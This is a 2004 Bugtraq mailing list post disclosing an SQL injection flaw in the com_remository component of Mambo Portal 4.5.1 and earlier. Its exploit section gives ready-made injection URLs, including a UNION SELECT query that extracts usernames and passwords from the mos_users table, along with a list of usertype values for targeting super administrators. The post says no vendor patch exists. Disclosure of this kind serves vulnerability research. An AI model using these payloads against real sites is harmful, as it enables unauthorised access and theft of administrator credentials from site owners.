|
Bugtraq
mailing list archives
Mambo Portal lasted version 4.5.1 (1.09) and lower vesion : SQL injection Vulnerability.
From: khoaimi <kh0aimi () yahoo com>
Date: 18 Sep 2004 03:39:46 -0000
Vendor
www.mamboportal.com
Message from vendor : Mambo is one of the most powerful Open Source Content Management Systems on the planet. It is
used all over the world for everything from simple websites to complex corporate applications. Mambo is easy to
install, simple to manage, and reliable.
Bug name : SQL injection
Version : lastest Version 4.5.1(1.0.9) and lower.
Exploit :
http://www.mamboportal.com/index.php?option=com_remository&Itemid=27&func=fileinfo&parent=folder&filecatid=499%20and%201=0[SQL]/*
You can exploit from the table "mos_users" with the query below
http://www.mambosite.com/index.php?option=com_remository&Itemid=[id]&func=selectfolder&filecatid=[id]%20and%201=0%20union%20all%20select%201,2,3,4,username,6,password,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%20from%20mos_users%20where%20usertype=0/*
with the values of usertype :
0 = superadministrator
1 = administrator
2 = editor
3 = user
5 = publisher
6 = manager
Vendor feedback :
Not yet
Vendor patch :
Not yet
khoai
www.xfrog.org
 By Date 
By Thread
Current thread:
- Mambo Portal lasted version 4.5.1 (1.09) and lower vesion : SQL injection Vulnerability. khoaimi (Sep 18)
|
Intro
